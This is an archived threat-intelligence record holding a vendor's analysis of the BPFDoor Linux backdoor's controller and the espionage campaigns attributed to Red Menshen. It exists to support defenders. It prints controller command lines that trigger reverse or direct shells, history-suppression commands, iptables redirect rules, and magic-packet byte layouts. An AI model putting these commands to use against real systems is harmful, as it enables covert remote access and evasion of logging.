{
	"id": "31e5c233-3aae-4e4d-ac83-7fa0c190399a",
	"created_at": "2026-04-06T00:16:13.798441Z",
	"updated_at": "2026-04-10T03:33:12.101994Z",
	"deleted_at": null,
	"sha1_hash": "c842edc0b627e5c594454b71f8bd71048ea36e03",
	"title": "BPFDoors Hidden Controller Used Against Asia, Middle East Targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 494730,
	"plain_text": "BPFDoors Hidden Controller Used Against Asia, Middle East\r\nTargets\r\nBy By: Fernando Mercês Apr 14, 2025 Read time: 10 min (2773 words)\r\nPublished: 2025-04-14 · Archived: 2026-04-05 14:54:21 UTC\r\nKey Takeaways\r\nBPFDoor is a state-sponsored backdoor designed for cyberespionage activities. Through our investigation\r\nof BPFDoor attacks, we unearthed a controller that hasn’t been observed being used anywhere else. We\r\nattribute this controller to Red Menshen, an advanced persistent threat (APT) group that Trend Micro\r\ntracks as Earth Bluecrow.\r\nThe controller could open a reverse shell. This could allow lateral movement, enabling attackers to enter\r\ndeeper into compromised networks, allowing them to control more systems or gain access to sensitive data.\r\nAccording to our telemetry, recent BPFDoor attacks zero in on the telecommunications, finance, and retail\r\nsectors, with attacks observed in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt.\r\nBPFDoor is equipped with stealthy defense evasion techniques. Trend Vision One™ Network Security has\r\nTippingPoint Intrusion Prevention and Deep Discovery Inspector (DDI) rules available to Trend Micro\r\ncustomers to protect them against this threat.\r\nWith contributions from Mohammad Mokbel, Daniel Lunghi, Feike Hacquebord, and Carl Jayson Peliña\r\nIntroduction\r\nThe stealthy rootkit-like malware known as BPFDoor (detected as Backdoor.Linux.BPFDOOR) is a backdoor\r\nwith strong stealth capabilities, most of them related to its use of Berkeley Packet Filtering (BPF).\r\nIn a previous article, we covered how BPFDoor and  BPF-enabled malware work. BPF is a technology for\r\nexecuting code in the operating system’s kernel virtual machine. It has been around for more than 20 years and\r\nreceived a lot of attention after 2014 when the eBPF (short for extended BPF at the time) was released.\r\nBPFDoor uses the packet filtering features of BPF, sometimes called classic BPF (cBPF). 
BPFDoor malware loads a filter that is capable of inspecting network packets in the upper layers of the operating system stack, such as netfilter (the Linux firewall) or any traffic capturing tool.\r\nThe filter loaded by BPFDoor enables the malware to be activated by network packets containing “magic sequences” – a set of byte sequences defined by the threat actor that tells the backdoor on the infected machine to perform an action. Other malware, such as Symbiote, also makes use of BPF to deliver similar functionality.\r\nBecause of how BPF is implemented in the targeted operating system, the magic packet triggers the backdoor despite being blocked by a firewall. As the packet reaches the kernel’s BPF engine, it activates the resident backdoor. While these features are common in rootkits, they are not typically found in backdoors.\r\nhttps://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nPage 1 of 11\n\nA backdoor like this can stay hidden in a network for a long time, and casual security sweeps such as port scans won't see anything unusual. It also has evasion techniques, such as the ability to change its process name, and the backdoor does not listen on any port, making it difficult for system administrators to suspect that something is wrong with the servers. This makes BPFDoor a perfect tool for long-term espionage.\r\nBackground and latest targets\r\nBPFDoor has been active for at least four years, with a report by PwC mentioning multiple incidents involving it in 2021. 
The same report also attributed the backdoor to Red Menshen.\r\nThis advanced persistent threat (APT) group, which Trend Micro tracks as Earth Bluecrow, is still actively targeting companies in the Asia, Middle East, and Africa (AMEA) region according to our telemetry.\r\nDate | Country | Industry\r\nDecember 2024 | South Korea | Telecommunications\r\nDecember 2024 | Myanmar | Telecommunications\r\nOctober 2024 | Malaysia | Retail\r\nSeptember 2024 | Egypt | Financial services\r\nJuly 2024 | South Korea | Telecommunications\r\nJanuary 2024 | Hong Kong | Telecommunications\r\nTable 1. Country and industry distribution of companies targeted by BPFDoor in 2024\r\nThe threat actor targeted Linux servers from the aforementioned organizations. They used different paths to hide the malware, such as /tmp/zabbix_agent.log, /bin/vmtoolsdsrv, and /etc/sysconfig/rhn/rhnsd.conf. Investigation into which initial entry point was used is still ongoing.\r\nAmong the targeted servers, we found a malware controller used to access other affected hosts in the same network after lateral movement. In some cases, more than one server was compromised.\r\nThis shows that Earth Bluecrow is actively controlling BPFDoor-infected hosts and uploading additional tools for later use. 
This specific controller file hasn’t been observed being used anywhere else.\r\nBPFDoor controller\r\nThe controller reveals some interesting details on the techniques wielded by this threat actor.\r\nBefore sending one of the “magic packets” checked by the BPF filter inserted by BPFDoor malware, the controller asks its user for a password that will also be checked on the BPFDoor side.\r\nDepending on the password provided and the command-line options used, the controller asks the infected machine to perform one of these actions:\r\n- Open a reverse shell\r\n- Redirect new connections to a shell on a specific port\r\n- Confirm the backdoor is active\r\nBelow is a list of the supported options:\r\nOption | Description\r\n-b | Listen on a specified TCP port (spawn a shell if it receives a connection)\r\n-c | Turn on encryption\r\n-d | Destination port on the infected host (any open port)\r\n-f | Set a different magic sequence for the TCP or UDP protocols\r\n-h | Destination host (the infected machine to control)\r\n-i | ICMP mode\r\n-l | Set the remote host the infected machine will connect to (reverse shell)\r\n-m | Set the local IP address as the remote host. It overrides the -l option\r\n-n | Do not use a password (check if the backdoor is alive)\r\n-o | Set the magic sequence to 0x7155\r\n-p | Set the password. If absent, the program will interactively ask for one\r\n-s | The remote port the infected machine will connect to (reverse shell)\r\n-t | Unused\r\n-u | UDP mode\r\n-w | TCP mode\r\n-x | Set the magic sequence for ICMP\r\nThe password sent by the controller must match one of the hard-coded values in the BPFDoor sample. 
In the sample that was paired up with the controller we found, the malware prefixes the clear-text password with a fixed salt, calculates its MD5 hash, and compares it with the hard-coded values, as shown in the screenshot below:\r\nApart from using different connection modes, the controller is versatile enough to control infected machines using the three protocols supported by BPFDoor – TCP, UDP, and ICMP.\r\nFor each protocol, it uses the hard-coded magic sequence, but it also allows the attacker to set it manually (options -f and -x), which shows the threat actor considered a change of magic bytes a likely option and made the controller ready to work with different BPFDoor samples.\r\nIn addition to the magic sequence, the password must match one of the passwords expected by the running BPFDoor sample on the target. The connection can be encrypted (-c), and the right password must be provided to make BPFDoor open a shell or listen on a port.\r\nBoth connection modes were already covered by existing articles, such as this technical analysis; meanwhile, our research gives a view from the controller.\r\nReverse connection mode\r\nTCP mode\r\nTo demonstrate, picture this scenario: the attacker is operating from a machine with the IP address 192.168.32.133, and there's an infected machine with the IP address 192.168.32.156. The following command will ask the BPFDoor running on the target machine to open an encrypted reverse shell session with the attacker's machine at port 8000/tcp:\r\n./controller -cd 22 -h 192.168.32.156 -ms 8000\r\nBelow is a breakdown of the command line:\r\n-c turns on the encryption. This is optional.\r\n-d 22 sets the destination port to 22/tcp, which should be open. 
The host doesn't have to accept the packet. This is just used for triggering the BPF program loaded by BPFDoor that will check the magic sequence.\r\n-h 172.16.23.129 is the target's IP address.\r\n-m sets the attacker machine's external IP address as the destination host for the reverse connection.\r\n-s 8000 sets the destination port to listen for incoming connections on the attacker machine.\r\nThe process works as follows:\r\n1. The controller sends the activation packet containing the magic bytes, the remote IP address and port for the target to connect to, and the password.\r\n2. The controller listens on port 8000/tcp due to both the -m and -s 8000 options.\r\n3. The target reads the packet, and if everything is correct, it connects to the remote IP address and port. In case -m is used, the remote IP address will be the controller's IP address.\r\n4. The reverse shell is opened.\r\nFigure 2. Reverse connection mode process flow\r\nThe video below demonstrates our simulation to show how this process works in practice:\r\nThe bottom portion of the video shows the target machine. First, we checked the target's IP address and ran a BPFDoor sample. On the same machine, we double-checked that the BPF filter is loaded with the ss command.\r\nThen, on the attacker machine, we ran the controller and provided it with the target's IP address and the SSH port that we know is open. After inputting the password, the reverse connection is initiated.\r\nAs the video shows, the threat actors were careful enough to disable logging of commands typed in the shell and in the MySQL command line. 
This is done by the following commands:\r\nexport MYSQL_HISTFILE=/dev/null\r\nexport HISTFILE=/dev/null\r\nThis suggests they specifically look for targets running MySQL server software.\r\nAt the network level, we can see that the first TCP packet sent by the controller contains the default magic sequence for TCP, 0x5293, at the beginning of the TCP payload. It also contains the \"justrobot\" password we typed in, as shown below:\r\nFigure 3. TCP packet sent by the BPFDoor controller to the target with its payload highlighted.\r\nThe highlighted lines in Figure 3 show the following:\r\n52 93 00 00 – magic bytes used with TCP: 0x5293\r\nc0 a8 20 85 – remote IP address set to 192.168.32.133 because we used the -m option\r\n1f 40 – remote port set to 8000\r\n\"justrobot\" – unencrypted password\r\nDefenders should watch for TCP packets containing a 32-bit-sized 0x5293 at the beginning of a 24-byte TCP payload followed by a 32-bit IPv4 address, a 16-bit port number, and a null-terminated ASCII string.\r\nHowever, it is important to note that deeper packet analysis is needed to avoid false positives. Also, the magic bytes can be easily changed by the -f and -x options. In a previous article, we also covered samples using the sequence 0x39393939 for TCP.\r\nFor the -d option, any open port would work, including UDP ones.\r\nUDP mode\r\nThe following command uses the port 5353/udp opened by the avahi-daemon process:\r\n./controller -cud 5353 -h 192.168.32.156 -ms 8000\r\nThe only difference is the -u option, which causes the controller to use UDP instead of the default TCP protocol. In this case, defenders should look for UDP packets containing the magic sequence 0x7255 at the beginning of the UDP payload. The screenshot below shows the traffic captured in Wireshark:\r\nFigure 4. 
First packet sent by the BPFDoor controller using the UDP protocol\r\nDefenders should look for UDP payloads starting with a 32-bit-sized 0x7255.\r\nICMP mode\r\nIf no TCP or UDP ports are open on a target, which is very unlikely for an internet-facing server, the attackers can still try to connect to their targets via ICMP. A possible command is as follows:\r\nsudo ./controller -cid 1 -h 192.168.32.156 -ms 8000\r\nWhile the port number (-d option) is required, it is insignificant in this case.\r\nFigure 5 shows the ICMP Echo request (ping) containing the 0x7255 magic sequence and the password. The reverse shell is opened using TCP.\r\nFigure 5. Packet sent by the BPFDoor controller in ICMP mode\r\nFor every infection, the password to authenticate the controller might be different. Therefore, writing either file-based or network-based detection rules that rely on the password is not effective.\r\nDirect mode\r\nTo make things easier for the threat actor, the controller has the ability to directly connect to an infected machine and get a shell on it without any reverse connections. To achieve this, a possible command line would be:\r\n./controller -cd 22 -h 192.168.32.156\r\nThe right password must be provided to activate the direct mode. Once the password is checked, BPFDoor malware uses a series of iptables commands to redirect new connections from the controller's IP address to the destination port (22/tcp in our example) to the first available port between 42391 and 43390 on the infected host, where BPFDoor will serve a shell. 
The commands are as follows:\r\n/sbin/iptables -I INPUT -p tcp -s \u003ccontroller IP address\u003e -j ACCEPT\r\n/sbin/iptables -t nat -A PREROUTING -p tcp -s \u003ccontroller IP address\u003e --dport \u003cdestination port\u003e -j REDIRECT --to-ports \u003cport between 42391 and 43390\u003e\r\nThe controller waits a few seconds for the changes to take effect on the infected machine, then it tries to connect to the same IP address and port (presumably redirected at this point).\r\nFigure 6. The controller function that directly connects to the infected machine after redirection\r\nTo avoid interrupting the legitimate service bound to the TCP port (SSH in our example), BPFDoor malware deletes the iptables rules it previously added. By the time it removes the rules, the attacker is already connected and is able to run any commands. A video of this mode at work in our lab is as follows:\r\nThe direct connection mode only works with TCP. Because the controller expects a specific response, defenders might look for outbound TCP packets with a 4-byte TCP payload containing the string “3458”:\r\nFigure 7. Response sent by the infected machine to a direct connection from a BPFDoor controller\r\nAttribution\r\nBased on the TTPs, the target industries, the fact that this specific controller was not seen anywhere else, and its similarities in coding style and programming language to BPFDoor, we attribute the campaign involving the controller to Earth Bluecrow with medium confidence. Since the BPFDoor malware source code was leaked in 2022, no other campaigns could be attributed to Earth Bluecrow yet.\r\nOutlook and conclusions\r\nBPFDoor uses BPF to trigger the backdoor. There are also other malicious uses of such filters. 
As mentioned earlier, the Symbiote malware uses a BPF filter to prevent being detected in traffic captures.\r\nBPF opens a new window of unexplored possibilities for malware authors to exploit. As threat researchers, it is a must to be equipped for future developments by analyzing BPF code, which will help protect organizations against BPF-powered threats.\r\nAlso, it is important to remember that BPF not only affects Linux systems. For example, there's a BPFDoor sample compiled for Solaris that exploits CVE-2019-3010, and there are efforts to bring eBPF to Windows. This requires deeper research and constant vigilance to gain more insight into attacks launched in other environments.\r\nProactive security with Trend Vision One™\r\nTrend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection. This comprehensive approach helps you predict and prevent threats, accelerating proactive security outcomes across your entire digital estate.\r\nBacked by decades of cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity AI, it delivers proven results: a 92% reduction in ransomware risk and a 99% reduction in detection time. 
Security leaders can benchmark their posture and showcase continuous improvement to stakeholders.\r\nWith Trend Vision One, you’re enabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for innovation.\r\nTrend protections\r\nTrend Micro customers are protected from threats mentioned in the blog entry via the following rules and filters:\r\nTrend Vision One™ Network Security\r\nDeep Discovery Inspector (DDI)\r\n5360: ICMP_BPFDOOR_REQUEST.APT\r\nTippingPoint Intrusion Prevention\r\n45583: ICMP: Backdoor.Linux.Bpfdoor.USELVH222 Runtime Detection (Ingress - Activation Packet)\r\n45589: Backdoor.Linux.Bpfdoor.USELVH222 Runtime Detection (Ingress - Activation Packet)\r\n45590: Backdoor.Linux.Bpfdoor.USELVH222 Runtime Detection (Ingress - Activation Packet)\r\nTrend Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Vision One customers can access a range of Intelligence Reports and Threat Insights. Threat Insights helps customers stay ahead of cyber threats before they happen and allows them to prepare for emerging threats by offering comprehensive information on threat actors, their malicious activities, and their techniques. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and effectively respond to threats.\r\nTrend Vision One Intelligence Reports App [IOC Sweeping]\r\nBPFDoor IOC used in Earth Bluecrow campaigns\r\nTrend Vision One Threat Insights App\r\nThreat actor: Earth Bluecrow\r\nEmerging Threats: BPFDoor’s Hidden Controller Used Against AMEA Targets\r\nHunting Queries\r\nTrend Vision One Search App\r\nTrend Vision One customers can use the Search App to match or hunt for the malicious indicators mentioned in this blog post with data in their environment.
\r\n(tags: \"XSAE.F11533\" OR malName: BPFDOOR)\r\nAll Trend customers should look for files detected as follows:\r\nBackdoor.Linux.BPFDOOR\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html"
	],
	"report_names": [
		"bpfdoor-hidden-controller.html"
	],
	"threat_actors": [
		{
			"id": "9c8a7541-1ce3-450a-9e41-494bc7af11a4",
			"created_at": "2023-01-06T13:46:39.358343Z",
			"updated_at": "2026-04-10T02:00:03.300601Z",
			"deleted_at": null,
			"main_name": "Red Menshen",
			"aliases": [
				"Earth Bluecrow",
				"Red Dev 18"
			],
			"source_name": "MISPGALAXY:Red Menshen",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434573,
	"ts_updated_at": 1775791992,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c842edc0b627e5c594454b71f8bd71048ea36e03.pdf",
		"text": "https://archive.orkl.eu/c842edc0b627e5c594454b71f8bd71048ea36e03.txt",
		"img": "https://archive.orkl.eu/c842edc0b627e5c594454b71f8bd71048ea36e03.jpg"
	}
}